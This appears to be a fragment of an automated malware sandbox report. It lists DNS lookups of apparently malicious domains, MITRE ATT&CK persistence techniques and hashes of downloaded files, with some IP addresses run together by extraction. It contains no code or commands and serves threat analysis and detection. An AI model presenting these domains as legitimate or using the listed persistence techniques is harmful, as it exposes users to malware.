DNS Response
149.154.167.99
-
5.0kB 13.2kB 21 19
-
116 B 131 B 2 1
DNS Request
ninhaine.com
DNS Request
ninhaine.com
-
186 B 135 B 3 1
DNS Request
2makestorage.com
DNS Request
2makestorage.com
DNS Request
2makestorage.com
-
73 B 166 B 1 1
DNS Request
99.167.154.149.in-addr.arpa
-
232 B 233 B 4 3
DNS Request
nisdably.com
DNS Request
nisdably.com
DNS Request
nisdably.com
DNS Request
nisdably.com
-
58 B 131 B 1 1
DNS Request
aucmoney.com
-
59 B 132 B 1 1
DNS Request
thegymmum.com
-
95 B 168 B 1 1
DNS Request
fe0b449a-bcc8-4a3a-a035-53814b5092ca.ninhaine.com
-
65 B 138 B 1 1
DNS Request
atvcampingtrips.com
-
66 B 139 B 1 1
DNS Request
server2.ninhaine.com
-
189 B 136 B 3 1
DNS Request
kuapakualaman.com
DNS Request
kuapakualaman.com
DNS Request
kuapakualaman.com
-
126 B 136 B 2 1
DNS Request
renatazarazua.com
DNS Request
renatazarazua.com
-
60 B 133 B 1 1
DNS Request
nasufmutlu.com
-
66 B 139 B 1 1
DNS Request
server2.ninhaine.com
-
118 B 2
DNS Request
spolaect.info
DNS Request
spolaect.info
-
58 B 90 B 1 1
DNS Request
wfsdragon.ru
DNS Response
104.21.5.208172.67.133.215
-
71 B 133 B 1 1
DNS Request
208.5.21.104.in-addr.arpa
-
144 B 158 B 2 1
DNS Request
88.156.103.20.in-addr.arpa
DNS Request
88.156.103.20.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
22.236.111.52.in-addr.arpa
-
62 B 173 B 1 1
DNS Request
tse1.mm.bing.net
DNS Response
204.79.197.20013.107.21.200
-
139 B 1
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
180B
MD54bc8a3540a546cfe044e0ed1a0a22a95
SHA15387f78f1816dee5393bfca1fffe49cede5f59c1
SHA256f90fcadf34fbec9cabd9bcfdea0a63a1938aef5ea4c1f7b313e77f5d3f5bbdca
SHA512e75437d833a3073132beed8280d30e4bb99b32e94d8671528aec53f39231c30476afb9067791e4eb9f1258611c167bfe98b09986d1877ca3ed96ea37b8bceecf
-
Filesize
975KB
MD52d0217e0c70440d8c82883eadea517b9
SHA1f3b7dd6dbb43b895ba26f67370af99952b7d83cb
SHA256d8ede520a96e7eff75e753691e1dd2c764a3171ffa0144675c3e08f4be027c01
SHA5126d7779a1f0dd54c0598bfb68f5e01a309021437a8b578353a063baf7c5ac2b29e5706ba51d1c1831e1517c5ea6fa662744c3f3e68a0e094c3b83ca9ed134413d
-
Filesize
897KB
MD5f709715401ab7fe50bc780760bf9e3e5
SHA16d7193cfd1f546eda62a1609b9b8f52a72c3fc55
SHA256721ddafd3417eb0cf0e57076265bb124fdf00e2debc13e8bb0a27c89fdc808d2
SHA5126dfc5b0dea4a134271f7b36029d451259887d42334fb2ed6cf9c8adaef80370866f0e35e4f139225ac267f624c3ebf1e88cc75db2ab1a7baacf92ec84a8eb13a
-
Filesize
712KB
MD5b89068659ca07ab9b39f1c580a6f9d39
SHA17e3e246fcf920d1ada06900889d099784fe06aa5
SHA2569d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c
SHA512940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52
-
Filesize
381KB
MD55a8cac0f11af5d1f697fd4605b94340b
SHA126fc1b275094e6cf7926f82435463fca441e308a
SHA256d9772558c0555b9e531e50af984ab64b4e38af2917712acf5d96caafec05ec76
SHA5129f4d5c9247177bace98ddac536261f44e4301bdaf6ea03eb834855e65a1b65f27e295f56b2bd7145baa9321fc47b01d6dd0b41483ea89ee54427fed2ea92c311
-
Filesize
2.4MB
MD5e8d7444ace76d0133904769a90eba8f7
SHA1bcd825a99ac408b549bcdd39dad697375c3ec9b5
SHA256f733fd9bf7666ad08e4307bb589cdf4dc3db443203db7d80ce1de8055f917597
SHA512b1ea5a2611e5faad019a15f2c953d778f197400f21f62326010d9498fb321c6ed60081ae7607d3d3d17036c19bb997780ea0dbc95a2e329e06485a57fdc3b2a9
-
Filesize
1.9MB
MD54aea6c7f7ba606db6574190ff4748d39
SHA1100b67ccd32baaa184fc2f675c274947985d1483
SHA256ce727f7b573c110fbb6fdabf416800f2febd0733abfcbe18b102e4351aa95407
SHA5124b63daa29178bb07e30a06715137718c7dbec1c02381a7736bfb6e76582d614c607d8284f71f3d18953760b29390cd839adb2311e51991fd4e58dce787b1699b
-
Filesize
92KB
MD5f31ee2053b3957b3f4bc6ef8255370da
SHA13db7330f217f9edd664e7da4015f4c914251b82d
SHA25665d41d6f881da0784a1c52a873db53569d64802f2cc77a55b170bb1b199870a4
SHA512ef1d02a858a276b596d8ccb1cecf6c0aec04ab070570953d631178a3abb787422bd1860edf91cdf5a032e1ab914ad68e5967f15c80e071b076beda9c6921169e
-
Filesize
1.4MB
MD541b7c6d48d13e1a864bf2d3759e257e6
SHA17ee45121a927d744941651bd6673d3df21f1611b
SHA256820c980f68378170cec0e1f2f4e2e319a07b1d030d7712ece110f579fcd1a8c2
SHA5120ac230d6ea4f7eaf1c5dbc919e1de41416e4c5e527e0ec583135eab2067d0fcd22615d80a93f803ce327cdbb58b5b236ca47d759647b8c36a98a17a3e1504077
-
Filesize
381KB
MD510c4e134206eaeae9629258618e961c9
SHA11c98596001b3cee511b33f699011bd02e0ca619a
SHA25678e19f3f017faffd6ed02b03b67b5dc6a521b1537aee0cc939c5b162a73bb799
SHA5126b235bc2a438a56ee2e7d34510b805fb2e44f22b111cfdb0d6480c6aa50972d9bd847cd6cd8ceb50cce625a1d0b91696f12f8ad3e2393d70efa94838c30f2f3a
-
Filesize
201KB
MD5b70f516d57624c741cabeebb65cce996
SHA198c27ae9fa2742dfedcf765c5b37d7830673c2ff
SHA25632e4d190cebe0be41e148b8863fad2c8973b1afc9d60238ac9ec1daeb1e1a2d2
SHA512aae21583810803053b0112f720c142de570b75c41d6bb63ae7e870750678478cc7140204c1108b83fee7f53de77e5de2a9752fdff0279563ceea94c2401acf95
-
Filesize
2KB
MD5ab1253d04d3633af6804a6ff3c0c9904
SHA1c2577e0ba6c2c17a6aa93f3d3d2a97e4dbda7eda
SHA256378719b4004d6b4e63f0b01053d71d6c34657932304f4df41570da723e31d68c
SHA512b53f0cf09c01be7a17ac665f064017db091abd25f2549fd2856a638b716dd430525ae7d42f178f5b8a9df00a9a8c17cecbed498272385b33150eaa71c20c2010
-
Filesize
874B
MD5d34e174a8d8291f281221479e90ebb8a
SHA1d1cc01aee3978d8418a910650ff4562c3554f712
SHA256fd10a2cd968299619d9e44e55c52b04c9f684b02214a11be1dcff5a2f25f3a09
SHA5123306bbdb8c227acefd5003aa0faa8eb3897ab2c24ae86c1d329aff39928c5bb7062d1feaeb2d4daf04b1a9346e150879b27aefa59e49e392b6dc83fa59b080fd
-
Filesize
225KB
MD57bf9b6e5588c88e1d00a1519f63e1e8a
SHA13dae75da7ac4402521d3ce9a5cc639c27a575914
SHA2568ce458e431bcda749a998acacfb23def4f00e4665e8e63ad09071acd2f821980
SHA51265ee05f087b5e403595811f1a2efcddbd1bbc80759b0a388c7b011c5698c0d3cae3abcbb428150db583ac4f6e51e31b1071fd52b910e555564aaf2e94f385f18
-
Filesize
51KB
MD50c290dfa9f665e3ef9bf334312e43965
SHA1b047ed22c06fc98822d70a8e609d13deb3a88653
SHA256f0de5c618a260fd6e6fe6b8ffc59bca5cf2dc9e4ef2bd73a05c71dd0f752f303
SHA5120a0f6f32e1c6d0055af87866fa934fe338df81abf52c24c9cdaa3a8acecf1b22350cb3d8281f9cde1448390a96bc91ef3dd5c31a37050958018d11b4cdbf53e4
-
Filesize
214KB
MD51a1ea56ab621b6302509b15c30af87f3
SHA16249a3c2f4336a828d59b07724ae9983a3eef264
SHA2565d3685c1a78ebb08d03a5de627bba9c55f0e7bfbd6d5efa61c6ad26d111bb2c4
SHA51266a7c29bc1f0e573c24af632edf1250ae50517c37cd5d2560e0f8619ebb76f26137bd234f504501dd4a79ad7779a17e3e83951cb907f92174102fa3811d48a90